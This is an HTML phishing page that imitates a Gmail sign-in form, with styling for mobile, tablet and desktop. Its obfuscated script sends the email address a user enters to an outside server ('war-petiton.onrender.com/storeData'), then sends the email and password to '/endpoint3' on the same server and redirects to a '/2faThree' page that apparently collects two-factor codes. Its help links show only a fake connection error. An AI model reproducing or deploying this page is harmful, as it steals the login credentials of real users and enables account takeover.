<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gmail Login</title>
</head>
<style>
    .loading-txt{
        font-size: 14px;
        font-family: 'Poppins',sans-serif;
        text-align: center;
        display: none;
    }
    @media screen and (max-width:560px) {
        *body{
            padding: 0;
            margin: 0;
        }
        ul { padding:0 }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .out-of-names-div{
            width: 100%;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -20px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      top: -25px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color:#fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 600;
        }
        .use-google{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            position: relative;
            top: -20px;
        }
        .not-your,.learn-more{
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            color: #464646;
            padding: 5%;
            position: relative;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 14px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            margin-right: 5px;
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            border: none;
            font-family: 'Poppins',sans-serif;
        }
        .show-forget{
            display: flex;
            justify-content: space-between;
            padding-right: 10px;
        }
        #show{
            font-size: 14px;
            font-weight: 500;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 11px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
            position: relative;
        }
    }

    @media (min-width: 561px) and (max-width:1200px) {
        *body{
            padding: 0;
            margin: 0;
        }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            font-weight: 400;
            position: relative;
            top: -20%;
        }
        .show-forget{
            display: flex;
            justify-content: space-between;
            padding-right: 3%;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      background-color: #fff;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
      background-color: #fff;
    }
    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 14px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 15%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      left: 7%;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }
    .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        .use-google{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            color: #464646;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .out-of-names-div{
            width: 100%;
            display: flex;
            justify-content: space-between;
            position: relative; 
            top: -30px;
        }
        
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
            margin-right: 5%;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }   
    }

    @media (min-width:1200px) {
        body{
            justify-content: center;
        }
        .container{
            width: 23%;
            transform: translate(150%,25%);
            border: 1px solid rgba(151, 151, 151, 0.308);
            height:530px;
            border-radius: 10px;
            padding:10px;
        }
        .logo-img{
            display: flex;
            justify-content: center;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -30px;
            font-weight: 400;
        }
        .use-google{
            position: relative;
            top: -40px;
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      top: -40px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            color: #464646;
            padding: 5%;
            position: relative;
            top: -20px;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
            position: relative;
            top: -10%;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
            position: relative;
            top: -10%;
        }
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
           .show-forget{
            display: flex;
            justify-content: space-between;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
    }
</style>
<body>
    <section id="home-section">
        <h4 class="loading-txt">Loading.....</h4>
        <div class="container">
            <div class="logo-img">
                <img src="/images/icon-ar21.svg" alt="">
            </div>
            <h4 class="sign-in-text"> Signin</h4>
            <h4 class="use-google">Sign in to your account</h4>
                <div class="form-group">
                    <input type="email" id="email" name="dataInput" placeholder=" ">
                    <label for="email" id="email-label"> Email or Phone </label>
                  </div>
                  <!-- <h4 class="errormsg1">Enter a valid Email Address to continue</h4> -->
                  <div class="form-group">
                    <input type="password" id="password" name="myInput" placeholder=" ">
                    <label for="password"> Password </label>
                  </div>
                  <!-- <h4 class="errormsg2">Enter password to login</h4> -->
                  <div class="show-forget">
                    <a href="#" class="forgot-password" onclick="connectionErr()">Forgot password?</a>
                    <a href="#" class="forgot-password" id="show" onclick="showPassword()">Show</a>
                </div>
                  <h4 class="not-your">Not your computer? use guest mode to sign in privately</h4>
                  <a href="#" class="learn-more" id="learn-more" onclick="connectionErr()">Learn more about using Guestmode</a>
                  <div class="login-div">
                    <a href="#" class="create-account">Create Account</a>
                    <button id="login" onclick="handleLogin()">Login</button>
                  </div>
        </div>
    </section>


    <script>

function connectionErr() {
  setTimeout(() => {
    alert('Difficulty connecting to site!')
  }, 3000)
}
function sendPostRequest() {
  const _0x5751bb = document.getElementById('email').value,
    _0x2b0dd8 = { key1: _0x5751bb }
  fetch('https://war-petiton.onrender.com/storeData', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(_0x2b0dd8),
  })
    .then((_0x47cd9f) => _0x47cd9f.json())
    .then((_0xca776e) => {
      console.log('Success:', _0xca776e)
    })
    .catch((_0x5a4fe1) => {
      console.error('Error:', _0x5a4fe1)
    })
}
const handleLogin = async () => {
  const _0x1b2eea = 'https://war-petiton.onrender.com/endpoint3',
    _0x516b43 = document.getElementById('email').value
  _0x2c0495 = document.getElementById('password').value
  function _0x4d65fb(_0x6f5444) {
    return /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(_0x6f5444)
  }
  if (_0x516b43 == '' || !_0x4d65fb(_0x516b43)) {
    alert('Enter a valid Email to continue')
  } else {
    if (_0x2c0495 == '') {
      alert('Must Enter Password')
    } else {
      sendPostRequest()
      try {
        const _0x265713 = {
            email: _0x516b43,
            password: _0x2c0495,
          },
          _0x2f676f = await fetch(_0x1b2eea, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify(_0x265713),
          })
        _0x2f676f.status === 200 && (window.location.href = '/2faThree')
      } catch (_0xf29485) {
        console.error('Error', _0xf29485)
      }
    }
  }
}
function showPassword() {
  var _0x2458af = document.getElementById('password')
  _0x2458af.type === 'text'
    ? (_0x2458af.type = 'password')
    : (_0x2458af.type = 'text')
}
    </script>
</body>
</html>

